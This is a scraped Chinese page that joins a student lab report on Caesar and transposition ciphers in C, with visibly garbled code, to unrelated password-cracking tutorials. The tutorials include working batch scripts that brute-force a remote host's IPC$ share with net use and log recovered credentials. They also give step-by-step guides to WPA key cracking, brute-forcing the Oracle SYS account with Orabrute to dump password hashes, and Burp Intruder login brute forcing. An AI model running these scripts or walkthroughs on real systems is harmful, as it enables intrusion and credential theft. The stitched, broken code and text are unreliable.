替代密码和置换密码的C语言实现
实验一
一、实验名称:替代密码和置换密码的实现
二、实验目的:通过编程实现替代密码算法和置换密码算法,加深对古典密码体系的了解,为以后深入学习密码学奠定基础。
三、实验内容:
A:替代密码
1、实验原理:使用替代法进行加密,将明文中的字符用其他字符替代后形成密文。最早的替代密码是由Julius Caesar 发明的Caesar (恺撒)密码,又叫循环移位密码。它的加密过程可表示为: E(m) = (m+k ) mod n
其中,m为明文字母在字母表中的位置数;n为字母表中的字母个数;k为密钥;E(m)为密文字母在字母表中对应的位置数。
解密算法是:m = D(L) =(L-k)mod 26;
2、算法设计:使用两个函数分别进行加密和解密的过程,在主程序中通过选择加密还是解密来调用不同函数进行替代密码的加密和解密过程实现;
3、函数接口:
加密:int encrypt()
{
printf("输入明文:\n");
scanf("%s",a);
for(i=0;a[i]!='\0';i++)
{
b[i]=a[i]-64;
}
printf("输入一位密钥\n");
scanf("%d",&k);
printf("\n");
for(i=0;b[i]!='\0';i++)
{
m[i]=(b[i]+k)%26+64;
}
printf("%s",&m);
return 0;
}
解密:int decode()
{
printf("输入密文:\n");
scanf("%s",a);
for(i=0;a[i]!='\0';i++)
{b[i]=a[i]-64;}
printf("输入一位密钥\n"); scanf("%d",&k);
printf("\n");
for(i=0;b[i]!='\0';i++)
{n[i]=(b[i]-k)%26+64;} printf("%s",n);
return 0;
}
4、程序流程图:
5、测试结果截图:
加密:
解密:
B:
1、实验原理:
不改变明文字符,但是把字符在明文中的排列顺序改变,来实现明文信息的加密。置换密码也被称为换位密码。本次实验使用的是矩阵换位法,是将明文中的字母按照给定的顺序安排在一个矩阵中,然后又根据密钥提供的顺序重新组合矩阵中的字母,从而形成密文。
解密过程是根据密钥的字母数作为列数,将密文按照列、行的顺序写出,再根据由密钥给出的矩阵置换产生新的矩阵恢复正常顺序,从而恢复明文。
2、算法设计:通过选择加密或解密,使用置换矩阵顺序和恢复矩阵顺序的两个函数,分别在主函数中进行调用来实现置换密码的加密解密实现;
3、函数接口:
加密:int jiami()
{
int i = 0, j = 0, key_len = 0, text_len = 0, row = 0;
char key[LENGTH] = { 0 };
char number[LENGTH] = { 0 };
char ptext[LENGTH * 10] = { 0 };
char ctext[LENGTH * 10] = { 0 };
printf("输入明文:\n");
scanf("%s", ptext);
i = 0;
while (ptext[i] != 0)
{
text_len++;
i++;
}
printf("输入密钥:\n");
scanf("%s", key);
i = 0;
while (key[i] != 0)
{
key_len++;
i++;
}
for (i = 0; i { number[i] = 0; for (j = 0; j { if (key[j] number[i]++; } } for (i = 0; i { for (j = i + 1; j { if (key[j] == key[i]) number[j]++; } } if (text_len%key_len == 0) row = text_len / key_len; else row = text_len / key_len + 1; for (i = 0; i { for (j = 0; j { ctext[i*row + j] = ptext[number[i] + key_len*j]; } } for (i = 0; i { for (j = 0; j { printf("%c", ctext[i*row + j]); } } return 0; } 解密:int jiemi() { int i = 0, j = 0, key_len = 0, text_len = 0, row = 0; char key1[LENGTH] = { 0 }; char ptext1[LENGTH * 10] = { 0 }; char ctext1[LENGTH * 10] = { 0 }; char number1[LENGTH] = { 0 }; printf("输入密文:\n"); scanf("%s", ctext1); while (ctext1[i] != 0) { text_len++; i++; } printf("输入密钥"); scanf("%s", key1); i = 0; while (key1[i] != 0) { key_len++; i++; } for (i = 0; i { int j = 0; number1[i] = 0; for (j = 0; j { if (key1[j] number1[i]++; } } for (i = 0; i { int j = 0; for (j = i + 1; j { if (key1[j] == key1[i]) number1[j]++; } } if (text_len%key_len == 0) row = text_len / key_len; else row = text_len / key_len + 1; for (i = 0; i { for (j = 0; j { ptext1[number1[i] + key_len*j] = ctext1[i*row + j]; } } for (i = 0; i { for (j = 0; j { printf("%c", ptext1[i*row + j]); } } return 0; } 4、程序流程图: 5、测试结果截图: 三、实验总结: 1、在进行替代密码实现的时候,总是出现程序终止,然后一步步调试,还用了断点测试,最后发现是循环的终止条件设置错误,最后经过了改正,程序能够从正常运行; 2、在进行置换实验的时候,设置的数组总是出错,数量不足或排序错误,感觉对这一方面的代码实现有很大的不足,置换数组方面忘记了很多概念,应该进行转么的复习; 3、经过这一次的实验,对古典密码中的替代密码和置换密码有了一定的了解,感觉对于密码学有了很浓厚的兴趣,想要进一步了解一些密码的算法和实现的方法; 4、感觉一个假期没有编程,忘记了很多语句和各种基本知识,感觉应该再系统地复习一遍,再多加练习。 四、问题回答: 替代密码:分析密文中的字母频率后将可以对照破解;可能严重偏离标准频率,加入文章少于100个字母,那么对它的解密就会比较困难。 改进:在单一恺撒密码的基础上扩展出多表密码,称为"维吉尼亚"密码。引入了"密钥"的概念,即根据密钥来决定用哪一行的密表来进行替换,可以对抗字频统计。 五、实验代码: A、替代密码: #include #include #include int k,i=0; char a[100]; char b[100],m[100],n[100]; int encrypt() { printf("输入明文:\n"); scanf("%s",a); for(i=0;a[i]!='\0';i++) { b[i]=a[i]-64; } printf("输入一位密钥\n"); scanf("%d",&k); printf("\n"); for(i=0;b[i]!='\0';i++) { m[i]=(b[i]+k)%26+64; } printf("%s",&m); return 0; } int decode() { printf("输入密文:\n"); scanf("%s",a); for(i=0;a[i]!='\0';i++) {b[i]=a[i]-64;} printf("输入一位密钥\n"); scanf("%d",&k); printf("\n"); for(i=0;b[i]!='\0';i++) {n[i]=(b[i]-k)%26+64;} printf("%s",n); return 0; } int main() { int c; printf("加密选择1,解密选择2 \n"); scanf("%d",&c); if(c==1) { encrypt(); } if(c==2) { decode(); } return 0; } B、置换密码: #include #include #define LENGTH 26 int jiami() { int i = 0, j = 0, key_len = 0, text_len = 0, row = 0; char key[LENGTH] = { 0 }; char number[LENGTH] = { 0 }; char ptext[LENGTH * 10] = { 0 }; char ctext[LENGTH * 10] = { 0 }; printf("输入明文:\n"); scanf("%s", ptext); i = 0; while (ptext[i] != 0) { text_len++; i++; } printf("输入密钥:\n"); scanf("%s", key); i = 0; while (key[i] != 0) { key_len++; i++; } for (i = 0; i { number[i] = 0; for (j = 0; j { if (key[j] number[i]++; } } for (i = 0; i { for (j = i + 1; j { if (key[j] == key[i]) number[j]++; } } if (text_len%key_len == 0) row = text_len / key_len; else row = text_len / key_len + 1; for (i = 0; i { for (j = 0; j { ctext[i*row + j] = ptext[number[i] + key_len*j]; } } for (i = 0; i { for (j = 0; j { printf("%c", ctext[i*row + j]); } } return 0; } { int i = 0, j = 0, key_len = 0, text_len = 0, row = 0; char key1[LENGTH] = { 0 }; char ptext1[LENGTH * 10] = { 0 }; char ctext1[LENGTH * 10] = { 0 }; char number1[LENGTH] = { 0 }; printf("输入密文:\n"); scanf("%s", ctext1); while (ctext1[i] != 0) { text_len++; i++; } printf("输入密钥"); scanf("%s", key1); i = 0; while (key1[i] != 0) { key_len++; i++; } for (i = 0; i { int j = 0; number1[i] = 0; for (j = 0; j { if (key1[j] number1[i]++; } } for (i = 0; i { int j = 0; for (j = i + 1; j { if (key1[j] == key1[i]) number1[j]++; } } if (text_len%key_len == 0) row = text_len / key_len; row = text_len / key_len + 1; for (i = 0; i { for (j = 0; j { ptext1[number1[i] + key_len*j] = ctext1[i*row + j]; } } for (i = 0; i { for (j = 0; j { printf("%c", ptext1[i*row + j]); } } return 0; } int main() { int a; printf("加密选择1,解密选择2"); scanf("%d", &a); if (a == 1) { jiami(); } else if (a == 2) { jiemi(); } return 0; } #include Burp Suite--- Intruder小技巧 作者:小冰50421961[AT] QQ [Dot] com 0x00 题外话 最近朋友送了我少女时代日本巡回演唱会蓝光高清限量版,太激动了!为此表示感谢,所以才有了下文。O(∩_∩)O哈哈~废话不多说,进入正题。 0x01 Intruder—暴力破解 安装要求: Java环境下载地址: https://www.wendangku.net/doc/9c1860459.html,/j2se/downloads.html Burp Suite下载地址: https://www.wendangku.net/doc/9c1860459.html,/burp/download.html 入门: 安装完成后可以双击可执行的JAR文件,如果不工作,你可以运行在命令提示符或终端输入。命令: Java –jar burpsuite_v1.4.jar 上篇文章对于burp的基本设置,已经说了很明了了,在这我就只提下就行咯。(*^__^*) 嘻嘻…… 配置过程如下: 代理端口配置如下图: 浏览器的配置如下图: 然后把拦截(intercept)功能关闭,因为我们这里不需要进行数据拦截 目标:登陆页面 思路过程:寻找登陆错误关键字—进行暴力破解 打开我们的目标如下图: 我们随意填写账户密码进行登陆,以此获取到登陆的错误信息如下图: 然后返回burp看提交和返回数据信息如下图: 发现我们浏览器所爆出的错误信息在数据包返回的页面中根本无法找到。我想这应该是要pro 版本 才能查看到数据吧 O(∩_∩)O 哈哈~ 开个玩笑!其实细心的童鞋会发现我上图我所标注的地方,HTTP 状态码302—重定向到另外一个url,我们看看第二个url 返回的内容如下图: #include"stdio.h" #include"time.h" #include"stdlib.h" #include"malloc.h" #include"string.h" int main() { char a[10],b[]={"000000"},c[]={"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU VWXYZ"}; int d[6]; clock_t start,finish; double TheTimes; do { printf("请输入六位密码:"); gets(a); if(a[6]=='\0') { break; } printf("ERROR\n" ); } while(1); start=clock(); while(1) { for(d[5]=0;d[5]<64;d[5]++) { b[5]=c[d[5]]; for(d[4]=0;d[4]<64;d[4]++) { b[4]=c[d[4]]; for(d[3]=0;d[3]<64;d[3]++) { b[3]=c[d[3]]; for(d[2]=0;d[2]<64;d[2]++) { b[2]=c[d[2]]; for(d[1]=0;d[1]<64;d[1]++) { b[1]=c[d[1]]; for(d[0]=0;d[0]<64;d[0]++) { b[0]=c[d[0]]; if(strcmp(a,b)==0) { printf("破解密码得:"); puts(b); finish=clock(); TheTimes=(double)((finish-start)/CLOCKS_PER_SEC); printf("用时%f秒。\n",TheTimes); return(0); } } } } } } } } return(0); } 原理: 1、字典:for /f %i in (字典文件) do net use 主机ipc$ "%i" /user:"用户" 2、数字:for /l %i in (start,step,end) do net use 主机ipc$ "%i" /user:"用户" 实现: 将下面文件存为start.bat: @echo off echo ---------------------------------------- >>c:pwd.txt date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解结果:>>c:pwd.txt if "%6"=="1" goto shit2 :shit1 start "正在破解....." /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 goto quit :shit2 start "正在破解......" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5 :quit 将下面文件存为test.bat: net use %1ipc$ %2 /user:"%3" goto answer%ERRORLEVEL% rem %ERRORLEVEL% :answer0 echo 远程主机:"%1" >>c:pwd.txt echo 用户:"%3" >>c:pwd.txt echo 密码:%2 >>c:pwd.txt net use %1ipc$ /delet date /t >>c:pwd.txt time /t >>c:pwd.txt echo 破解完成。。。。zypcc >>c:pwd.txt exit :answer2 用法如下: 1、如果用字典破解:start.bat 字典文件路径及名称主机用户名 2、如果用数字破解: start.bat 起始数步长结束数主机用户名1 5秒破解Word文档密码 为Word文档加密本来无可厚非,但如果过段时间忘记了密码怎么办?虽然网络上充斥着各种破解软件,但它们无一例外的采用暴力破解方式,耗费时间长并且成功率低。我们今天将采用一种特殊的方法,在几秒内解除Word中的密码,让你的宝贵资料“失而复得”。 一、破解Word密码不是梦 其实我们利用的也是一款软件——Word Password Recovery Master(下载地址: https://www.wendangku.net/doc/9c1860459.html,/utility/encrpt/9295.html),解压缩软件后不必安装,直接运行WPasRec.exe,软件的使用方法更是简单,通过浏览按钮指定已经加密的Word文档,然后软件会自动识别该文档具备何种密码,此时相应的“Remove”按钮即可解除对应的密码。完成后会弹出如图2所示信息,整个过程非常快,但在破解中必须保证电脑已经连接到网络。 最后会在加密文档的同级目录下生成一个新文件,以“demo”标注,再次打开这个文件,或者点软件界面的“Open document in microsoft Word”直接打开破解后的文档。在破解使用了10位密码加密并且文档容量在250KB的过程中只耗费了不到5秒种。 在破解过程中必须连接到网络,如果出现错误对话框可能是由于网络不稳定造成的,最好尝试重新破解。 二、Excel也别跑 Office Password Remover也是一款破解软件,它不但能解除Word密码,还可以破解Excel密码(下载地址:https://www.wendangku.net/doc/9c1860459.html,/utility/encrpt/9295.html)。首先保证要破解的文件没被占用,然后指定加密文件进行破解,速度同样很快,但必须连接到网络。虽然这款软件也可以破解Word密码,但笔者还是推荐使用Word Password Recovery Master,因为经过测试它连接服务器相对更稳定。 用了这两款软件,再保密的Word(Excel)文件也能恢复回来,对付应急情况很管用。 解决办法: 方法一:如果你仅仅是想对该文件进行编辑,可将你那个文档用记事本或写字板打开(右键-打开方式)(这时你会发现可以对文字进行选择、拷贝及粘帖等操作),将所有文本进行拷贝粘帖至一新建word文档中,从而实现对它的编辑工作。 方法二:如果想破解它的“文档保护”功能,可按下述方法进行: 1、转换文件格式:鼠标双击打开该文件,在“文件”下选择“另存”,将该文件保存为网页文件(html格式),关闭该文档。 路由器密码忘记 五步暴力破解 我是一名家庭用户, 最近不小心忘记了家里无线路由器的登录密码, 现在唯一知道的就是该 设备使用的是 5 位以内的数字作为密码, 那么我想问专家如何来解决这种密码为纯数字的暴 力破解问题呢?在线急切等待。 下载地址:https://www.wendangku.net/doc/9c1860459.html,/dh/jm/200811/2800.html 一、实验环境网络拓扑简介: 本文主要采取的是暴力破解WPA加密密钥的方法,这就需要网络中存在足够多的经过WPA加密过的数据包,因此本人选择了一台计算机专门提供这种加密过的数据包,即该计算机与网络中的无线路由器通过WPA验证后不停的通讯。在此基础上再通过另外一台计算机窃取加密数据包并暴力破解。具体设备如下。 AP:D-Link DWL-2000AP+A,负责设置WPA加密信息。 无线客户端:笔记本+D-Link DWL-G122无线网卡,负责保证持续不断的WPA数据通讯。 监听/破解机:笔记本+NetGear WAG511v2无线网卡,担任捕捉登陆‘握手’会话并破解出KEY的机器。 二、手把手教你暴力破解WPA密文: 不管是破解WPA加密数据还是WEP加密数据我们都需要找到专门的监听和分析软件,类似于有线网络中的sniffer,在无线网络中我们破解主要使用名为WinAirCrack的强大工具。我们在以前讲解破解WEP密文时已经为各位介绍了该软件的简单使用以及软件下载地址,感兴趣的读者可以查询之前的文章。 WinAircrackPack--下载 第一步:下载WinAirCrack程序并解压缩,然后根据之前的文章下载自己无线网卡对应的驱动,将驱动升级为基于atheros芯片的无线网卡。具体方法需要我们到 https://www.wendangku.net/doc/9c1860459.html,/support/downloads/drivers这个地址下载适合自己无线网卡品牌的驱动。 第二步:无线网卡准备工作完毕后打开WinAirCrack程序安装主目录,运行其中的airdump.exe。 第三步:首先选择监听网卡为自己的无线网卡,接下来选择自己无线网卡使用的芯片类型,“o”是hermesl/realtek,“a”是aironet/atheros,只有这两类。由于笔者的是以atheros为核心的产品,所以选择a即可。 第四步:选择要监听的信号,由于笔者知道无线网络使用的是10信道,所以直接选择10。如果日后各位读者要破解WPA又不知道其发射信道的话,可以选择0,这代表扫描所有信道。 第五步:设置扫描信息保存文件名称,自己随便起一个能够辨别的名字即可。 第六步:将所有信息填写完毕后就开始针对数据进行捕捉了,从窗口显示中我们可以看到airdump.exe扫描出的当前无线网络的SSID信息,信道以及速率等等信息,在ENC列处显示该无线网络使用的加密方式为WPA。 Orabrute暴力破解oracle密码 来源:edeed 1 标准的Oracle 密码可以由英文字母,数字,#,下划线(_),美元字符($)构成,密码的最大长度为30 字符;Oracle 密码不能以"$","#","_"或任何数字开头;密码不能包含"SELECT","DELETE","CREATE"这类的Oracle/SQL 关键字。 2 Oracle 的弱算法加密机制:两个相同的用户名和密码在两台不同的Oracle 数据库机器中,将具有相同的 哈希值。这些哈希值存储在https://www.wendangku.net/doc/9c1860459.html,ER$表中。可以通过像DBA_USERS 这类的视图来访问。 3 Oracle 默认配置下,每个帐户如果有10 次的失败登录,此帐户将会被锁定。但是SYS 帐户在Oracle 数 据库中具有最高权限,能够做任何事情,包括启动/关闭Oracle 数据库。即使SYS 被锁定,也依然能够访问 数据库。 由前面的基础知识3,可以得知选择远程破解Oracle 的最好帐户是SYS,因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码,Oracle10g 虽然提示修改密码了,但是并没有检查密码的复杂性。 可以使用Orabrute 工具来进行远程破解,在使用这个工具的时候,需要系统提前安装好Sqlplus,该工具的 原理很简单,就是不停的调用Sqlplus 然后进行登录验证,帐户选择的是SYS,密码则为password.txt 中的密码单词。只要登录成功,就会调用selectpassword.sql 脚本抓取出在https://www.wendangku.net/doc/9c1860459.html,ER$表中的其他用户的哈希值,然后退出程序。这里有个注意的地方,当第二次运行Orabrute 的时候,需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。 Orabrute 的下载地址: https://www.wendangku.net/doc/9c1860459.html,/research/papers/oraclepasswords.zip Orabrute 的官方文档: https://www.wendangku.net/doc/9c1860459.html,/research/papers/oraclepasswords.pdf Orabrute 的使用方法为: D:\soft\oracle\Orabrute>orabrute Orabrute v 1.2 by Paul M. Wright and David J. Morgan: orabrute 首先声明:本人所教的破解电脑密码纯属技术教程,非传播不道德的破坏性的黑客行为! 特此声明!进入正题: 要破解电脑密码很多人都说直接拔了主板电池就可以去掉开机密码,那是愚人之作为,因为拔掉主板电池之前,你需要拔掉主机电源;因此当你拔掉电池后,主板没有电源来源,CMOS (咱们常说的BIOS,一些主板集成在一起的叫法)没有电源供应,然后BIOS里面的密码就会消失,但是我们的用户密码是存储在一个叫SAM的文件里面的,而这个文件是系统文件,系统文件存储在硬盘上的,试问:剥掉电池怎么能去除硬盘里的系统文件呢?呵呵..所有某些人说的拔掉电池去密码是愚蠢做法。不过拔掉电池倒可以去除另外一个密码,就是BIOS 密码,一般人不去设置BIOS密码的,除非是公司服务器,ISP服务器等,需要时刻注意网络安全的PC才会去设置IBOS密码。 以上所说希望大家谨记了,接下来给大家真正破解的方法,是借助第三方软件,它就是大家很熟悉的老毛U盘PE系统制作软件,或者是大白菜U盘PE系统制作软件(这要根据是否具有那个功能的软件了),我用的是大白菜U盘启动制作工具201108 版本,网络上有免费得下载地址。。。。 第一步:下载安装好大白菜: 第二步,打开软件: 第三步:插入U盘,选择U盘的下拉菜单下选择你的U盘,当然只插入了一个U盘,就只一个选择,后面的选项基本都是USB—HDD,USB—ZIP很多主板都不用了。然后点击一键制作USB启动盘,之后提示的是否要格式U盘之类的都不用理了,直接下一步,直到完成。 第四步:拔掉U盘,重启电脑,进入BIOS,在FIRST BOOT DEVICE 选项里面把USB—HDD选为第一启动盘,按F10保存。然后插入U盘,重启电脑 第五步:进入电脑之后自动检测USB内的PE系统,然后选择下面的“破解WIN密码。。”暴力破解程序
BurpSuite爆破密码
暴力破解密码C语言
写Bat暴力破解系统密码
破解word密码(5秒破解Word文档密码)
路由器密码忘记 五步暴力破解
【解答】 很多时候我们家庭用户网络被入侵或者日常使用过程中都会遇到密码猜解的问 题, 家庭宽带路由器的密码遗忘而又无法通过其他办法恢复的话, 暴力破解方法是唯一的选 择。但是从以往的经验来看暴力破解密码工程庞大,所需要的时间非常长,小则几十小时多 则几天, 而且成功率还不高。 不过就笔者长期经验来说如果我们要破解的密码是纯数字的话, 完全可以通过小工具来实现暴力猜解的目的,今天我们就来用小工具让猜解密码不求人。
ramwpass 小档案:
软件版本:v1.0
软件类型:免费软件
软件大小:20KB
适应平台:windows2000/xp/2003
首先需要说明一点的是本文涉及的这种暴力破解纯数字密码的小工具是建立在基于图 形化界面的操作上,在图形化界面的帐户密码登录窗口中通过此工具来完成暴力破解的目 的,软件会自动从 0 开始尝试破解,每次破解失败都会自动加 1 来再次尝试,直到顺利进入 管理界面,然后我们再执行修改密码操作即可。具体步骤如下。
第一步:打开 IE 浏览器访问路由器的管理地址,出现管理帐户及密码登录界面。
第二步:打开我们下载的 ramwpass.exe,运行该程序,这时会弹出软件主界面。
第三步:在软件主界面中有一个 COMMAND1 的按钮,我们点该按钮。
第四步: 最后我们再次把鼠标点到管理界面用户名和密码登录处, 这里我们可以假定用 户名已经知道,毕竟不是 admin 就是 root,而有的设备根本不需要用户名,然后把光标放到 密码输入对话框中即可。
第五步: 接下来我们的小工具就开始了暴力破解数字密码的工作, 登录界面提示密码错 误也不用担心,软件会自动确认并尝试下一个数字。每次尝试都是之前的数字加 1,所有暴手把手教你暴力破解WPA密文
Orabrute暴力破解oracle密码
鸿鹄论坛_暴力破解密码图解